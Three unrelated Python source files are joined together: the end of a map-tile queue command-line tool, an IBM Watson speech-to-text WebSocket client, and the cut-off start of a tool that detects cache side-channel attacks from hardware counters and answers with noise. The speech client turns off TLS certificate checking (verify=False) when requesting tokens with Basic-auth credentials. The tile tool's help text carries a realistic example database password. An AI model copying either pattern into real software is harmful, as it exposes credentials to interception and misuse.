data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
# group by zoom is the exclusive stop for tiles if the command
# line coordinate is queue zoom
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
assert queue_zoom < group_by_zoom
formats = lookup_formats(cfg.output_formats)
zip_format = lookup_format_by_extension('zip')
assert zip_format
meta_low_zoom_logger.begin_run(parent)
coords = [parent]
# we don't include tiles at group_by_zoom, so unless parent.zoom is
# _more_ than one zoom level less, we don't need to include the pyramid.
if parent.zoom == queue_zoom and parent.zoom < group_by_zoom - 1:
        # there will be multiple meta tile coordinates in this run
coords.extend(coord_children_range(parent, group_by_zoom - 1))
for coord in coords:
coord_start_ms = int(time.time() * 1000)
meta_low_zoom_logger._log("start processing coord",
parent=parent,
coord=coord)
if check_metatile_exists:
existing_data = store.read_tile(coord, zip_format)
if existing_data is not None:
meta_low_zoom_logger.metatile_already_exists(parent, coord)
continue
coord_data = [dict(coord=coord)]
try:
fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
except Exception as e:
# the postgres db fetch doesn't perform the fetch at
# this step, which would make failures here very
# surprising
meta_low_zoom_logger.fetch_failed(e, parent, coord)
continue
assert len(fetched_coord_data) == 1
fetch, coord_datum = fetched_coord_data[0]
coord = coord_datum['coord']
def log_fn(data):
meta_low_zoom_logger._log(data, parent, coord)
processor = Processor(
coord, cfg.metatile_zoom, fetch, layer_data,
post_process_data, formats, cfg.buffer_cfg,
output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
log_fn=log_fn)
try:
processor.fetch()
except Exception as e:
meta_low_zoom_logger.fetch_failed(
e, parent, coord)
continue
try:
formatted_tiles, _ = processor.process_tiles()
except Exception as e:
meta_low_zoom_logger.tile_process_failed(
e, parent, coord)
continue
try:
tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
meta_low_zoom_logger._log('start writing {n} tiles for coord'.format(n=len(tiles)), parent=parent, coord=coord) # noqa
for tile in tiles:
store.write_tile(tile['tile'], tile['coord'], tile['format'])
except Exception as e:
meta_low_zoom_logger.metatile_storage_failed(
e, parent, coord)
continue
meta_low_zoom_logger.tile_processed(parent, coord, coord_start_ms)
meta_low_zoom_logger.end_run(parent)
def tilequeue_main(argv_args=None):
if argv_args is None:
argv_args = sys.argv[1:]
parser = TileArgumentParser()
subparsers = parser.add_subparsers()
# these are all the "standard" parsers which just take a config argument
# that is already included at the top level.
cfg_commands = (
('process', tilequeue_process),
('seed', tilequeue_seed),
('dump-tiles-of-interest', tilequeue_dump_tiles_of_interest),
('load-tiles-of-interest', tilequeue_load_tiles_of_interest),
('enqueue-tiles-of-interest', tilequeue_enqueue_tiles_of_interest),
('enqueue-stdin', tilequeue_enqueue_stdin),
('prune-tiles-of-interest', tilequeue_prune_tiles_of_interest),
('wof-process-neighbourhoods', tilequeue_process_wof_neighbourhoods),
('wof-load-initial-neighbourhoods',
tilequeue_initial_load_wof_neighbourhoods),
('consume-tile-traffic', tilequeue_consume_tile_traffic),
('stuck-tiles', tilequeue_stuck_tiles),
('delete-stuck-tiles', tilequeue_delete_stuck_tiles),
('rawr-process', tilequeue_rawr_process),
('rawr-seed-toi', tilequeue_rawr_seed_toi),
('rawr-seed-all', tilequeue_rawr_seed_all),
)
def _make_peripherals(cfg):
redis_client = make_redis_client(cfg)
toi_helper = make_toi_helper(cfg)
tile_queue_result = make_tile_queue(
cfg.queue_cfg, cfg.yml, redis_client)
tile_queue_name_map = {}
if isinstance(tile_queue_result, tuple):
tile_queue, queue_name = tile_queue_result
tile_queue_name_map[queue_name] = tile_queue
else:
assert isinstance(tile_queue_result, list), \
'Unknown tile_queue result: %s' % tile_queue_result
for tile_queue, queue_name in tile_queue_result:
tile_queue_name_map[queue_name] = tile_queue
queue_mapper_yaml = cfg.yml.get('queue-mapping')
assert queue_mapper_yaml, 'Missing queue-mapping configuration'
queue_mapper = make_queue_mapper(
queue_mapper_yaml, tile_queue_name_map, toi_helper)
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
inflight_yaml = cfg.yml.get('in-flight')
inflight_mgr = make_inflight_manager(inflight_yaml, redis_client)
enqueue_batch_size = 10
from tilequeue.queue.writer import QueueWriter
queue_writer = QueueWriter(
queue_mapper, msg_marshaller, inflight_mgr, enqueue_batch_size)
stats = make_statsd_client_from_cfg(cfg)
peripherals = Peripherals(
toi_helper, stats, redis_client, queue_mapper, msg_marshaller,
inflight_mgr, queue_writer
)
return peripherals
def _make_peripherals_command(func):
def command_fn(cfg, args):
peripherals = _make_peripherals(cfg)
return func(cfg, peripherals)
return command_fn
def _make_peripherals_with_args_command(func):
def command_fn(cfg, args):
peripherals = _make_peripherals(cfg)
return func(cfg, peripherals, args)
return command_fn
for parser_name, func in cfg_commands:
subparser = subparsers.add_parser(parser_name)
# config parameter is shared amongst all parsers, but appears here so
# that it can be given _after_ the name of the command.
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
command_fn = _make_peripherals_command(func)
subparser.set_defaults(func=command_fn)
# add "special" commands which take arguments
subparser = subparsers.add_parser('tile-status')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('coords', nargs='*',
help='Tile coordinates as "z/x/y".')
subparser.set_defaults(
func=_make_peripherals_with_args_command(tilequeue_tile_status))
subparser = subparsers.add_parser('tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('coord',
help='Tile coordinate as "z/x/y".')
subparser.set_defaults(
func=_make_peripherals_with_args_command(tilequeue_process_tile))
subparser = subparsers.add_parser('enqueue-tiles-of-interest-pyramids')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--zoom-start', type=int, required=False,
default=None, help='Zoom start')
subparser.add_argument('--zoom-stop', type=int, required=False,
default=None, help='Zoom stop, exclusive')
subparser.set_defaults(
func=_make_peripherals_with_args_command(
tilequeue_enqueue_full_pyramid_from_toi))
subparser = subparsers.add_parser('enqueue-random-pyramids')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--zoom-start', type=int, required=False,
default=None, help='Zoom start')
subparser.add_argument('--zoom-stop', type=int, required=False,
default=None, help='Zoom stop, exclusive')
subparser.add_argument('gridsize', type=int, help='Dimension of grid size')
subparser.add_argument('n-samples', type=int,
help='Number of total samples')
subparser.set_defaults(
func=_make_peripherals_with_args_command(
tilequeue_enqueue_random_pyramids))
subparser = subparsers.add_parser('rawr-enqueue')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--expiry-path', required=True,
help='path to tile expiry file')
subparser.set_defaults(func=tilequeue_rawr_enqueue)
subparser = subparsers.add_parser('meta-tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. '
'`["aws.rds.url", "localhost"]`')
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. '
'`["gis"]`')
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. '
'`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store '
'names e.g. `["my-meta-tiles-us-east-1"]`')
subparser.add_argument('--rawr_store_name', required=False,
help='optional string of rawr tile store '
'names e.g. `"my-rawr-tiles-us-east-1"`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix '
'e.g. `20210426`')
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating '
'whether to check metafile exists or not '
'e.g. `false`')
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. `arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_meta_tile)
subparser = subparsers.add_parser('meta-tile-low-zoom')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. `["aws.rds.url", "localhost"]`') # noqa
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. `["gis"]`') # noqa
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. `VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store names e.g. `["my-meta-tiles-us-east-1"]`') # noqa
subparser.add_argument('--rawr_store_name', required=False,
help='optional string of rawr tile store '
'names e.g. `"my-rawr-tiles-us-east-1"`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix e.g. `20210426`') # noqa
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating whether to check metafile exists or not e.g. `false`') # noqa
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. '
'`arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_meta_tile_low_zoom)
subparser = subparsers.add_parser('rawr-tile')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--tile', required=True,
help='Tile coordinate as "z/x/y".')
subparser.add_argument('--run_id', required=False,
help='optional run_id used for logging')
subparser.add_argument('--postgresql_hosts', required=False,
help='optional string of a list of db hosts e.g. '
'`["aws.rds.url", "localhost"]`')
subparser.add_argument('--postgresql_dbnames', required=False,
help='optional string of a list of db names e.g. '
'`["gis"]`')
subparser.add_argument('--postgresql_user', required=False,
help='optional string of db user e.g. `gisuser`')
subparser.add_argument('--postgresql_password', required=False,
help='optional string of db password e.g. '
'`VHcDuAS0SYx2tlgTvtbuCXwlvO4pAtiGCuScJFjq7wersdfqwer`') # noqa
subparser.add_argument('--store_name', required=False,
help='optional string of a list of tile store '
'names e.g. `["my-meta-tiles-us-east-1"]`')
subparser.add_argument('--rawr_store_name', required=False,
help='optional string of rawr tile store '
'names e.g. `"my-rawr-tiles-us-east-1"`')
subparser.add_argument('--store_date_prefix', required=False,
help='optional string of store bucket date prefix '
'which will override the prefix config'
' for meta tile and rawr tile s3 output'
'e.g. `20210426`')
subparser.add_argument('--batch_check_metafile_exists', required=False,
help='optional string of a boolean indicating '
'whether to check metafile exists or not '
'e.g. `false`')
subparser.add_argument('--s3_role_arn', required=False,
help='optional string of the S3 access role ARN'
'e.g. '
'`arn:aws:iam::1234:role/DataAccess-tilebuild`') # noqa
subparser.add_argument('--s3_role_session_duration_s', required=False,
type=int,
help='optional integer which indicates the number '
'of seconds for the S3 session using the '
'provided s3_role_arn'
'e.g. `3600`')
subparser.set_defaults(func=tilequeue_rawr_tile)
subparser = subparsers.add_parser('batch-enqueue')
subparser.add_argument('--config', required=True,
help='The path to the tilequeue config file.')
subparser.add_argument('--file', required=False,
help='Path to file containing coords to enqueue')
subparser.add_argument('--tile', required=False,
help='Single coordinate to enqueue')
    subparser.add_argument('--pyramid', action='store_true', required=False,
                           help='Enqueue all coordinates below queue zoom')
subparser.set_defaults(func=tilequeue_batch_enqueue)
args = parser.parse_args(argv_args)
assert os.path.exists(args.config), \
'Config file {} does not exist!'.format(args.config)
    # not every subcommand defines the S3 role arguments
    if getattr(args, 's3_role_arn', None):
        assert args.s3_role_arn.strip(), 's3_role_arn is invalid'
        assert args.s3_role_session_duration_s, \
            's3_role_arn is provided but s3_role_session_duration_s is not'
        assert args.s3_role_session_duration_s > 0, \
            's3_role_session_duration_s is non-positive'
    with open(args.config) as fh:
        # the db/store override arguments only exist on some subcommands,
        # so fall back to None when they are absent
        cfg = make_config_from_argparse(
            fh,
            postgresql_hosts=getattr(args, 'postgresql_hosts', None),
            postgresql_dbnames=getattr(args, 'postgresql_dbnames', None),
            postgresql_user=getattr(args, 'postgresql_user', None),
            postgresql_password=getattr(args, 'postgresql_password', None),
            rawr_store_name=getattr(args, 'rawr_store_name', None),
            store_name=getattr(args, 'store_name', None),
            store_date_prefix=getattr(args, 'store_date_prefix', None),
            batch_check_metafile_exists=getattr(
                args, 'batch_check_metafile_exists', None))
args.func(cfg, args)
|
sttClient.py
|
#
# Copyright IBM Corp. 2014
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Daniel Bolanos
# Date: 2015
# coding=utf-8
import json # json
import threading # multi threading
import os # for listing directories
import Queue  # queue used for thread synchronization
import sys # system calls
import argparse # for parsing arguments
import base64 # necessary to encode in base64 according to the RFC2045 standard
import requests # python HTTP requests library
# WebSockets
from autobahn.twisted.websocket import WebSocketClientProtocol, WebSocketClientFactory, connectWS
from twisted.python import log
from twisted.internet import ssl, reactor
class Utils:
@staticmethod
def getAuthenticationToken(hostname, serviceName, username, password):
uri = hostname + "/authorization/api/v1/token?url=" + hostname + '/' + serviceName + "/api"
uri = uri.replace("wss://", "https://");
uri = uri.replace("ws://", "https://");
print uri
resp = requests.get(uri, auth=(username, password), verify=False, headers= {'Accept': 'application/json'},
timeout= (30, 30))
print resp.text
jsonObject = resp.json()
return jsonObject['token']
class WSInterfaceFactory(WebSocketClientFactory):
def __init__(self, queue, summary, dirOutput, contentType, model, url=None, headers=None, debug=None):
WebSocketClientFactory.__init__(self, url=url, headers=headers, debug=debug)
self.queue = queue
self.summary = summary
self.dirOutput = dirOutput
self.contentType = contentType
self.model = model
self.queueProto = Queue.Queue()
self.openHandshakeTimeout = 6
self.closeHandshakeTimeout = 6
# start the thread that takes care of ending the reactor so the script can finish automatically (without ctrl+c)
endingThread = threading.Thread(target=self.endReactor, args= ())
endingThread.daemon = True
endingThread.start()
def prepareUtterance(self):
try:
utt = self.queue.get_nowait()
self.queueProto.put(utt)
return True
except Queue.Empty:
print "getUtterance: no more utterances to process, queue is empty!"
return False
def endReactor(self):
self.queue.join()
print "about to stop the reactor!"
reactor.stop()
# this function gets called every time connectWS is called (once per WebSocket connection/session)
def buildProtocol(self, addr):
try:
utt = self.queueProto.get_nowait()
proto = WSInterfaceProtocol(self, self.queue, self.summary, self.dirOutput, self.contentType)
proto.setUtterance(utt)
return proto
except Queue.Empty:
print "queue should not be empty, otherwise this function should not have been called"
return None
# WebSockets interface to the STT service
# note: an object of this class is created for each WebSocket connection, every time we call connectWS
class WSInterfaceProtocol(WebSocketClientProtocol):
def __init__(self, factory, queue, summary, dirOutput, contentType):
self.factory = factory
self.queue = queue
self.summary = summary
self.dirOutput = dirOutput
self.contentType = contentType
self.packetRate = 20
self.listeningMessages = 0
self.timeFirstInterim = -1
self.bytesSent = 0
self.chunkSize = 2000 # in bytes
        super(WSInterfaceProtocol, self).__init__()
print dirOutput
print "contentType: " + str(self.contentType) + " queueSize: " + str(self.queue.qsize())
def setUtterance(self, utt):
self.uttNumber = utt[0]
self.uttFilename = utt[1]
self.summary[self.uttNumber] = {"hypothesis":"",
"status":{"code":"", "reason":""}}
self.fileJson = self.dirOutput + "/" + str(self.uttNumber) + ".json.txt"
try:
os.remove(self.fileJson)
except OSError:
pass
    # helper method that sends a chunk of audio if needed (as required by the
    # specified pacing)
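    # with chunkSize = 2000 bytes (set in __init__) and one chunk scheduled
    # every 0.01 s via callLater, this paces the upload at roughly
    # 2000 / 0.01 = 200 kB/s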
def maybeSendChunk(self,data):
def sendChunk(chunk, final=False):
self.bytesSent += len(chunk)
self.sendMessage(chunk, isBinary = True)
if final:
self.sendMessage(b'', isBinary = True)
if (self.bytesSent+self.chunkSize >= len(data)):
if (len(data) > self.bytesSent):
sendChunk(data[self.bytesSent:len(data)],True)
return
sendChunk(data[self.bytesSent:self.bytesSent+self.chunkSize])
self.factory.reactor.callLater(0.01, self.maybeSendChunk, data=data)
return
def onConnect(self, response):
print "onConnect, server connected: {0}".format(response.peer)
def onOpen(self):
print "onOpen"
data = {"action" : "start", "content-type" : str(self.contentType), "continuous" : True, "interim_results" : True, "inactivity_timeout": 600}
data['word_confidence'] = True
data['timestamps'] = True
data['max_alternatives'] = 3
print "sendMessage(init)"
# send the initialization parameters
self.sendMessage(json.dumps(data).encode('utf8'))
# start sending audio right away (it will get buffered in the STT service)
print self.uttFilename
f = open(str(self.uttFilename),'rb')
self.bytesSent = 0
dataFile = f.read()
self.maybeSendChunk(dataFile)
print "onOpen ends"
def onMessage(self, payload, isBinary):
if isBinary:
print("Binary message received: {0} bytes".format(len(payload)))
else:
print(u"Text message received: {0}".format(payload.decode('utf8')))
# if uninitialized, receive the initialization response from the server
jsonObject = json.loads(payload.decode('utf8'))
if 'state' in jsonObject:
self.listeningMessages += 1
if (self.listeningMessages == 2):
print "sending close 1000"
# close the connection
self.sendClose(1000)
# if in streaming
elif 'results' in jsonObject:
jsonObject = json.loads(payload.decode('utf8'))
hypothesis = ""
# empty hypothesis
if (len(jsonObject['results']) == 0):
print "empty hypothesis!"
# regular hypothesis
else:
# dump the message to the output directory
jsonObject = json.loads(payload.decode('utf8'))
f = open(self.fileJson,"a")
f.write(json.dumps(jsonObject, indent=4, sort_keys=True))
f.close()
hypothesis = jsonObject['results'][0]['alternatives'][0]['transcript']
bFinal = (jsonObject['results'][0]['final'] == True)
if bFinal:
print "final hypothesis: \"" + hypothesis + "\""
self.summary[self.uttNumber]['hypothesis'] += hypothesis
else:
print "interim hyp: \"" + hypothesis + "\""
def onClose(self, wasClean, code, reason):
print("onClose")
print("WebSocket connection closed: {0}".format(reason), "code: ", code, "clean: ", wasClean, "reason: ", reason)
self.summary[self.uttNumber]['status']['code'] = code
self.summary[self.uttNumber]['status']['reason'] = reason
if (code == 1000):
self.summary[self.uttNumber]['status']['successful'] = True
# create a new WebSocket connection if there are still utterances in the queue that need to be processed
self.queue.task_done()
if self.factory.prepareUtterance() == False:
return
# SSL client context: default
if self.factory.isSecure:
contextFactory = ssl.ClientContextFactory()
else:
contextFactory = None
connectWS(self.factory, contextFactory)
# function to check that a value is a positive integer
def check_positive_int(value):
ivalue = int(value)
if ivalue < 1:
raise argparse.ArgumentTypeError("\"%s\" is an invalid positive int value" % value)
return ivalue
# function to check the credentials format
def check_credentials(credentials):
elements = credentials.split(":")
if (len(elements) == 2):
return elements
else:
raise argparse.ArgumentTypeError("\"%s\" is not a valid format for the credentials " % credentials)
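# Illustrative behaviour of the validators above:
#   check_positive_int("3")          -> 3
#   check_positive_int("0")          -> raises argparse.ArgumentTypeError
#   check_credentials("user:secret") -> ["user", "secret"]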
if __name__ == '__main__':
# parse command line parameters
parser = argparse.ArgumentParser(description='client to do speech recognition using the WebSocket interface to the Watson STT service')
parser.add_argument('-credentials', action='store', dest='credentials', help='Basic Authentication credentials in the form \'username:password\'', type=check_credentials)
parser.add_argument('-in', action='store', dest='fileInput', default='./recordings.txt', help='text file containing audio files')
parser.add_argument('-out', action='store', dest='dirOutput', default='./output', help='output directory')
parser.add_argument('-type', action='store', dest='contentType', default='audio/wav', help='audio content type, for example: \'audio/l16; rate=44100\'')
parser.add_argument('-model', action='store', dest='model', default='en-US_BroadbandModel', help='STT model that will be used')
parser.add_argument('-threads', action='store', dest='threads', default='1', help='number of simultaneous STT sessions', type=check_positive_int)
parser.add_argument('-tokenauth', action='store_true', dest='tokenauth', help='use token based authentication')
args = parser.parse_args()
# create output directory if necessary
if (os.path.isdir(args.dirOutput)):
while True:
answer = raw_input("the output directory \"" + args.dirOutput + "\" already exists, overwrite? (y/n)? ")
if (answer == "n"):
sys.stderr.write("exiting...")
sys.exit()
elif (answer == "y"):
break
else:
os.makedirs(args.dirOutput)
# logging
log.startLogging(sys.stdout)
# add audio files to the processing queue
q = Queue.Queue()
lines = [line.rstrip('\n') for line in open(args.fileInput)]
fileNumber = 0
for fileName in(lines):
print fileName
q.put((fileNumber,fileName))
fileNumber += 1
hostname = "stream.watsonplatform.net"
headers = {}
# authentication header
if args.tokenauth:
headers['X-Watson-Authorization-Token'] = Utils.getAuthenticationToken("https://" + hostname, 'speech-to-text',
args.credentials[0], args.credentials[1])
else:
string = args.credentials[0] + ":" + args.credentials[1]
headers["Authorization"] = "Basic " + base64.b64encode(string)
# create a WS server factory with our protocol
url = "wss://" + hostname + "/speech-to-text/api/v1/recognize?model=" + args.model
summary = {}
factory = WSInterfaceFactory(q, summary, args.dirOutput, args.contentType, args.model, url, headers, debug=False)
factory.protocol = WSInterfaceProtocol
for i in range(min(int(args.threads),q.qsize())):
factory.prepareUtterance()
# SSL client context: default
if factory.isSecure:
contextFactory = ssl.ClientContextFactory()
else:
contextFactory = None
connectWS(factory, contextFactory)
reactor.run()
# dump the hypotheses to the output file
fileHypotheses = args.dirOutput + "/hypotheses.txt"
f = open(fileHypotheses,"w")
counter = 1
successful = 0
emptyHypotheses = 0
for key, value in (sorted(summary.items())):
if value['status']['successful'] == True:
print key, ": ", value['status']['code'], " ", value['hypothesis'].encode('utf-8')
successful += 1
        if value['hypothesis'] == "":
emptyHypotheses += 1
else:
print key + ": ", value['status']['code'], " REASON: ", value['status']['reason']
f.write(str(counter) + ": " + value['hypothesis'].encode('utf-8') + "\n")
counter += 1
f.close()
print "successful sessions: ", successful, " (", len(summary)-successful, " errors) (" + str(emptyHypotheses) + " empty hypotheses)"
|
scam.py
|
import sys
import subprocess
import threading
import time
import socket
import shlex
import psutil
import os
import errno
from operator import truediv
import numpy
import DynamicUpdate
import ConfigParser
import matplotlib.pyplot as plt
config = ConfigParser.ConfigParser()
config.read ("scam.ini")
keepRunning = True
attackActive = False
def ConfigSectionMap(section):
dict1 = {}
options = config.options(section)
for option in options:
try:
dict1[option] = config.get(section, option)
if dict1[option] == -1:
print("skip: %s" % option)
except:
print("exception on %s!" % option)
dict1[option] = None
return dict1
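# Illustrative usage, assuming scam.ini contains e.g. "[comm]" with
# "tcp_port = 5005":
#   ConfigSectionMap("comm")['tcp_port']  -> '5005'
# values are always strings, hence the explicit int()/float() conversions
# below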
# Read parameters from ini
# quickhpc
NUM_OF_KEYS_PER_CHUNK = int(ConfigSectionMap("quickhpc")['num_of_keys_per_chunk'])
DECRYPT_DURATION = int(ConfigSectionMap("quickhpc")['decrypt_duration'])
SLEEP_DURATION = int(ConfigSectionMap("quickhpc")['sleep_duration'])
QUICKHPC_PATH = os.path.join(os.path.dirname(os.getcwd()), "quickhpc/quickhpc")
QUICKHPC_NUM_OF_ITERATION = ConfigSectionMap("quickhpc")['num_of_iteration']
QUICKHPC_INTERVAL_DURATION = ConfigSectionMap("quickhpc")['interval_duration']
QUICKHPC_CONF = os.path.join(os.path.dirname(os.getcwd()), "quickhpc/events.conf")
QUICKHPC_CHUNK = ((DECRYPT_DURATION + SLEEP_DURATION)) * NUM_OF_KEYS_PER_CHUNK
MONITOR_WINDOW = int(ConfigSectionMap("quickhpc")['monitor_window'])
WINDOW_AVG_THRESH = float(ConfigSectionMap("quickhpc")['window_avg_thresh'])
DETECT_THRESH = int(ConfigSectionMap("quickhpc")['detect_thresh'])
quickhpc_log_filename = ConfigSectionMap("quickhpc")['log_filename']
# SCAM
plotEnable = config.getboolean("scam", "plot_enable")
Scam_Cores = ConfigSectionMap("scam")['scam_cores'].split(",")
# Noisification
noisification_log_filename = ConfigSectionMap("noisification")['log_filename']
NOISIFICATION_PATH = os.path.join(os.path.dirname(os.getcwd()), "scam_noisification/scam/tool")
Min_Rumble_Duration = ConfigSectionMap("noisification")['min_rumble_duration']
Is_Complement_To = config.getboolean("noisification","is_complement_to")
LINES_PER_SET = int(ConfigSectionMap("noisification")['lines_per_set'])
Noise_Intensity = ConfigSectionMap("noisification")['noise_intensity'].split(",")
# Socket Communication Defines
server_request = ConfigSectionMap("comm")['server_request']
server_response = ConfigSectionMap("comm")['server_response']
TCP_PORT = int(ConfigSectionMap("comm")['tcp_port'])
TCP_IP = ConfigSectionMap("comm")['tcp_ip']
BUFFER_SIZE = int(ConfigSectionMap("comm")['buffer_size'])
DEMO_ARRAY_LEN = 300
noise_sock = None
target_sock = None
if Is_Complement_To:
Noise_Intensity[0] = str(int(Noise_Intensity[0])+LINES_PER_SET+1)
Noise_Intensity[1] = '0'
def pid_exists(pid):
"""Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def process_logger(pipe_from, pipe_dst, file_lock=None):
global keepRunning
while keepRunning:
line = pipe_from.readline()
if line:
if file_lock is not None:
with file_lock:
pipe_dst.write(line)
pipe_dst.flush()
else:
pipe_dst.write(line)
pipe_dst.flush()
else:
time.sleep (1)
pipe_dst.close()
#
# def analyzeSamples(samples,monitorChart):
# ratio = []
# for line in samples:
# PAPI_L3_TCM = map(int,line.split(','))[0]
# ratio.append(PAPI_L3_TCM)
# filterValueThresh = sorted(ratio)[len(ratio)*90/100]
# if plotEnable:
# ratioIndex = range (0, len (ratio))
# monitorChart.update (ratioIndex, ratio)
# j = 2
# while j<len(ratio)-2:
# if ratio[j] > filterValueThresh: # avereage anomalities
# ratio[j] = int(numpy.mean([ratio[j-2],ratio[j-1],ratio[j],ratio[j+1]]))
# j+=1
#
# j=0
# minRatio = int(numpy.max(ratio)) # init min
# while j<len(ratio)-10:
# tmpMeanRatio = int(numpy.mean(ratio[j:j+10]))
# if tmpMeanRatio < minRatio:
# minRatio = tmpMeanRatio
# j+=10
#
# thresholdForAnomaly = monitorAnomalyThreshold + minRatio
# j=0
# while j < len(ratio):
# if ratio[j] > thresholdForAnomaly:
# ratio[j] = 1
# else:
# ratio[j] = 0
# j+=1
# zeroIndex = 0
# j = 0
# ratio[len(ratio)-1] = 0
# while j < len(ratio):
# if ratio[j] == 0:
# if j-zeroIndex < 10:
# ratio[zeroIndex:j] = numpy.full(j-zeroIndex,0)
# zeroIndex = j
# j += 1
#
# j = 0
# while j < len (ratio):
# if ratio[j] == 1:
# return True
# j += 1
# return False
def quickhpc_analyzer(pipe_from):
noiseActive = False
lastTimeAttack = 0
attackActive = None
lines = []
monitorChart = None
if plotEnable:
monitorChart = DynamicUpdate.DynamicUpdate()
monitorChart.on_launch(0,NUM_OF_KEYS_PER_CHUNK * (SLEEP_DURATION + DECRYPT_DURATION),0,1)
global keepRunning, noise_sock
counter = 0
window = [0] * MONITOR_WINDOW
window_sum = 0
pointer = 0
demo_array = []
detectCounter = 0
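    # The loop below keeps a rolling mean of the L3 miss ratio over the last
    # MONITOR_WINDOW samples (circular buffer `window` plus running
    # `window_sum`); an attack is flagged once the mean stays above
    # WINDOW_AVG_THRESH for more than DETECT_THRESH consecutive samples.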
while keepRunning:
line = pipe_from.readline()
if line:
PAPI_L3_TCM,PAPI_L3_TCA = map (float, line.split (','))
try:
miss_ratio = truediv(PAPI_L3_TCM,PAPI_L3_TCA)
except ZeroDivisionError:
continue
if counter <= MONITOR_WINDOW: #to collect enough data for avg
counter += 1
pointer = (pointer + 1) % MONITOR_WINDOW
tmp = window[pointer]
window[pointer] = miss_ratio
window_sum += miss_ratio - tmp
window_avg = window_sum / MONITOR_WINDOW
if counter < MONITOR_WINDOW:
continue
if plotEnable:
demo_array.append(window_avg)
if len(demo_array) == DEMO_ARRAY_LEN:
monitorChart.update (range(len(demo_array)), demo_array)
demo_array = []
curr_time = time.time ()
if(window_avg > WINDOW_AVG_THRESH):
detectCounter+=1
else:
detectCounter=0
detect = (detectCounter>DETECT_THRESH)
attackActive_r = attackActive
if detect:
attackActive = True
lastTimeAttack = curr_time
if noiseActive is False:
print ("Turning On Noise")
send_to_client (noise_sock, "6 {} {} {} {}".format(Noise_Intensity[0],Noise_Intensity[1],Scam_Cores[0],Scam_Cores[1]))
noiseActive = True
else:
attackActive = False
if (noiseActive is True) and int(curr_time - lastTimeAttack) > int(Min_Rumble_Duration):
print "Turning Off Noise"
send_to_client (noise_sock, "7")
noiseActive = False
if attackActive_r != attackActive:
print "Attack: {}".format(attackActive)
def send_to_client(client_socket,msg):
client_socket.send(msg)
request = client_socket.recv(1024)
print 'Received {}'.format(request)
def main():
global huge_array, keepRunning, lastTimeAttack, noise_sock, target_sock,TCP_PORT
p = psutil.Process ()
p.cpu_affinity([int(Scam_Cores[1])])
# vars
server = None
